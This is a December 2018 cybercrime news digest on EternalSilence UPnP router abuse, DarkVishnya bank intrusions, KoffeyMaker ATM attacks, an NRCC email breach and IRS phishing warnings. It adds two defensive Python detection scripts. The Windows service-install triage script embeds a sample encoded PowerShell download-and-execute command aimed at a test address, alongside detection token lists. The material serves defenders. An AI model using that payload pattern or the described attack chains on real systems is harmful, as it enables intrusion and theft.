CyberCrime - W/E - 12/6/18

"EternalSilence" Attack Abuses UPnP Protocol to Compromise Routers (12/05/2018)
Akamai has published details of a follow-on to the UPnProxy attack it described earlier this year, in which routers with vulnerable implementations of the Universal Plug and Play (UPnP) protocol were abused as proxies. In the new campaign, which Akamai calls "EternalSilence", criminals use UPnP's port mapping feature to inject mappings that expose SMB (TCP 139/445) on machines behind the router, then chain the EternalBlue and EternalRed exploits against Windows SMB and Linux Samba respectively. Akamai counted at least 45,000 routers carrying the injected port mappings, but warns that many more routers are likely affected and that the number could reach well over one million.
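Checking whether a router's own mapping table already carries an injected rule is something a defender can do without Akamai's data. The following Python script is an added example, not Akamai's tooling: it parses UPnP IGD GetGenericPortMappingEntry responses and flags mappings that expose SMB/Samba on a LAN host (the EternalSilence pattern) or that point at an address outside the LAN (the earlier UPnProxy pattern). The SOAP responses are constructed samples; the description string "galleta silenciosa" is the label Akamai reported on injected rules and is treated only as a weak indicator. The transport details in the docstring (control URL, SOAPAction header, error 713 to terminate enumeration) are standard UPnP IGD behaviour, not taken from the page.

```python
"""Audit a router's UPnP IGD port-mapping table for injected entries: mappings
that expose SMB/Samba (TCP 139/445) on LAN hosts (EternalSilence), or that
point at non-LAN addresses so the router acts as a proxy (UPnProxy).

Added example, not Akamai's tooling. The SOAP responses below are constructed
samples. Against a real device you would POST build_query(i) for i = 0, 1, ...
to the WANIPConnection control URL (taken from the device description XML found
via SSDP) with the SOAPAction header set to
"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry",
stopping when the device answers with UPnP error 713 (SpecifiedArrayIndexInvalid).
"""
import ipaddress
import xml.etree.ElementTree as ET

WANIP_URN = "urn:schemas-upnp-org:service:WANIPConnection:1"
SMB_PORTS = {139, 445}
# RFC 1918 ranges; a mapping whose internal client is outside these is a proxy.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Description string Akamai reported on injected EternalSilence rules. Weak
# indicator only: an attacker can set it to anything.
KNOWN_BAD_DESCRIPTIONS = {"galleta silenciosa"}


def build_query(index: int) -> str:
    """SOAP body for GetGenericPortMappingEntry(index)."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:GetGenericPortMappingEntry xmlns:u="{WANIP_URN}">'
        f'<NewPortMappingIndex>{index}</NewPortMappingIndex>'
        '</u:GetGenericPortMappingEntry></s:Body></s:Envelope>'
    )


def parse_mapping(xml_text: str) -> dict:
    """Extract one port mapping from a GetGenericPortMappingEntryResponse."""
    root = ET.fromstring(xml_text)
    resp = next((e for e in root.iter()
                 if e.tag.endswith("GetGenericPortMappingEntryResponse")), None)
    if resp is None:
        raise ValueError("not a GetGenericPortMappingEntryResponse")
    field = lambda name: (resp.findtext(name) or "").strip()  # children are unnamespaced
    return {
        "remote_host": field("NewRemoteHost"),
        "external_port": int(field("NewExternalPort")),
        "protocol": field("NewProtocol").upper(),
        "internal_port": int(field("NewInternalPort")),
        "internal_client": field("NewInternalClient"),
        "enabled": field("NewEnabled") == "1",
        "description": field("NewPortMappingDescription"),
    }


def suspicious_reasons(m: dict) -> list:
    """Return why a mapping looks injected; an empty list means nothing flagged."""
    reasons = []
    if m["protocol"] == "TCP" and m["internal_port"] in SMB_PORTS:
        reasons.append(f"exposes SMB/Samba port {m['internal_port']} on "
                       f"{m['internal_client']} via external port {m['external_port']}")
    try:
        addr = ipaddress.ip_address(m["internal_client"])
        if not any(addr in net for net in LAN_NETS):
            reasons.append(f"internal client {m['internal_client']} is outside the LAN "
                           "(router used as a proxy)")
    except ValueError:
        reasons.append(f"internal client {m['internal_client']!r} is not an IP address")
    if m["description"].strip().lower() in KNOWN_BAD_DESCRIPTIONS:
        reasons.append(f"description {m['description']!r} matches a reported injected rule")
    return reasons


def audit(responses) -> list:
    """Parse each response; return (index, mapping, reasons) for flagged entries."""
    findings = []
    for i, xml_text in enumerate(responses):
        m = parse_mapping(xml_text)
        reasons = suspicious_reasons(m)
        if reasons:
            findings.append((i, m, reasons))
    return findings


def _response(ext, proto, internal_port, client, desc, remote=""):
    """Build a constructed GetGenericPortMappingEntryResponse for the samples."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        f'<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP_URN}">'
        f'<NewRemoteHost>{remote}</NewRemoteHost><NewExternalPort>{ext}</NewExternalPort>'
        f'<NewProtocol>{proto}</NewProtocol><NewInternalPort>{internal_port}</NewInternalPort>'
        f'<NewInternalClient>{client}</NewInternalClient><NewEnabled>1</NewEnabled>'
        f'<NewPortMappingDescription>{desc}</NewPortMappingDescription>'
        '<NewLeaseDuration>0</NewLeaseDuration>'
        '</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>'
    )


# Constructed samples: a benign BitTorrent mapping, an EternalSilence-style SMB
# exposure, and a UPnProxy-style mapping to an address outside the LAN.
SAMPLE_BENIGN = _response(51413, "TCP", 51413, "192.168.1.20", "Transmission")
SAMPLE_SMB = _response(47011, "TCP", 445, "192.168.1.40", "galleta silenciosa")
SAMPLE_PROXY = _response(8080, "TCP", 80, "203.0.113.9", "")

if __name__ == "__main__":
    for idx, m, reasons in audit([SAMPLE_BENIGN, SAMPLE_SMB, SAMPLE_PROXY]):
        print(f"[{idx}] {m['protocol']} {m['external_port']} -> "
              f"{m['internal_client']}:{m['internal_port']}")
        for r in reasons:
            print("    -", r)
```

The port-based check is the one that matters: it catches an injected rule regardless of the description the attacker chose. Remediation is to delete the mapping (DeletePortMapping) and, more importantly, stop the router from accepting UPnP control requests on its WAN interface, which is the underlying defect.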

DarkVishnya Bank Attacks Used Planted Devices to Siphon Money (12/05/2018)
Kaspersky Lab has published its analysis of attacks on banks in Eastern Europe that cost the victims tens of millions of dollars and that it attributes to a campaign it calls "DarkVishnya." In the first stage of each attack, one of three devices was planted inside the bank's network: a netbook or inexpensive laptop; a Raspberry Pi; or a Bash Bunny, a purpose-built tool for USB attacks. The attackers reached the planted device remotely over a built-in or USB-connected GPRS/3G/LTE modem. In the second stage, they connected to the device and scanned the local network for public shared folders, Web servers, and any other open resources, the aim being to map the network and identify the servers and workstations used for making payments; they also tried to brute-force or sniff login credentials for those machines. In the third stage, they logged into the target systems and installed remote access software to retain access, starting malicious services generated with msfvenom on the compromised computers. Because the intrusions relied on fileless techniques and PowerShell, they evaded application whitelisting and domain policies.
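The persistence step is the one that leaves a durable trace on the host: creating a service writes Event ID 7045 ("A service was installed in the system") to the System log, and an msfvenom- or PowerShell-based service looks nothing like a vendor's. The script below is an added example, not Kaspersky's tooling, that triages such events for the signs described above: a service whose binary path is a PowerShell one-liner (decoding the -EncodedCommand argument so the analyst can read it), a service binary dropped in a user-writable directory, and, as a corroborating signal only, a random-looking service name. The event records are constructed, the URL in the payload is a TEST-NET address, and the heuristics are the editor's assumptions; feed it the fields of real 7045 events exported with wevtutil or a log shipper.

```python
"""Triage Windows "service installed" events (System log, Event ID 7045) for
the persistence pattern Kaspersky describes in DarkVishnya: services created
from msfvenom-style payloads and PowerShell one-liners.

Added example, not Kaspersky's tooling. The records below are constructed and
the heuristics are the editor's assumptions; tune them to your estate.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, down to -e.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|enco|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPECT_TOKENS = ("iex", "invoke-expression", "downloadstring", "-nop", "-w hidden",
                  "windowstyle hidden", "frombase64string", "bypass")
# Directories a legitimate service binary has no business living in.
WRITABLE_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
# Letters-only, mixed-case names such as those generated by exploit frameworks.
# Used only to corroborate another finding, never on its own.
RANDOM_NAME = re.compile(r"(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{8,}")


def decode_encoded_command(image_path: str):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(image_path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def assess_service_install(ev: dict) -> list:
    """Reasons a 7045 event looks like attacker persistence; empty if none."""
    path = ev["ImagePath"]
    low = path.lower()
    reasons = []
    decoded = decode_encoded_command(path)
    if decoded is not None:
        reasons.append("base64-encoded PowerShell: " + decoded)
        low += " " + decoded.lower()  # match tokens inside the decoded command too
    if "powershell" in low:
        hits = [t for t in SUSPECT_TOKENS if t in low]
        if hits:
            reasons.append("PowerShell launched with " + ", ".join(hits))
    if any(d in low for d in WRITABLE_DIRS):
        reasons.append("service binary in a user-writable directory")
    if reasons and RANDOM_NAME.fullmatch(ev["ServiceName"]):
        reasons.append("random-looking service name (weak signal)")
    return reasons


def triage(events) -> list:
    """Return (event, reasons) for every event that raised at least one reason."""
    flagged = []
    for ev in events:
        reasons = assess_service_install(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed samples. The encoded payload is built here so it round-trips.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

EVENTS = [  # field names as they appear in the 7045 event XML
    {"ServiceName": "Tomcat9",
     "ImagePath": "\"C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\bin\\Tomcat9.exe\" //RS//Tomcat9",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "XkQdPwTzLaMb",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -enc " + ENCODED,
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "wuauserv2",
     "ImagePath": "C:\\Users\\Public\\svchost.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

if __name__ == "__main__":
    for ev, reasons in triage(EVENTS):
        print(f"{ev['ServiceName']}: {ev['ImagePath'][:60]}")
        for r in reasons:
            print("    -", r)
```

Decoding the command matters because the encoded form defeats naive string matching on the raw event; once decoded, the same token list applies. On hosts where PowerShell logging is enabled, the corresponding script block events (4104) give the same content with less guesswork.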

Kaspersky Lab Probes "KoffeyMaker" to Uncover Details of ATM Heists (12/04/2018)
Kaspersky Lab's team investigated KoffeyMaker, a malicious toolkit used by cyber thieves to raid ATMs belonging to Eastern European banks. Analysis revealed the "crime instrument" to be a laptop loaded with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7, chosen for driver compatibility. Apart from the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a, the attack was carried out entirely with legitimate tools. The same version of KDIAG was previously used by the Carbanak group.

Report: Four NRCC Officials Had Email Accounts Hacked (12/05/2018)
A cyber intrusion hit the email accounts of several senior aides affiliated with the National Republican Congressional Committee during the mid-term elections, anonymous officials told Politico. The accounts of four aides were compromised and kept under surveillance for several months before the intrusion was detected in April. House Speaker Paul Ryan and several other senior officials were not notified until Politico contacted them on December 4; committee officials said they had withheld notification while conducting an internal investigation. No details were disclosed on how long the intrusion lasted or who was behind it.

Thieves Use Tax Season, Holidays to Elicit Money in Phishing Scams (12/05/2018)
As the holidays and 2019 tax filing season loom, the Internal Revenue Service (IRS) is warning businesses and consumers to be aware of a surge in sophisticated phishing scams. Phishing attacks use email or malicious Web sites to solicit personal, tax, or financial information by posing as a trustworthy organization. IRS Commissioner Chuck Rettig said, "The holidays and tax season present great opportunities for scam artists to try stealing valuable information through fake emails."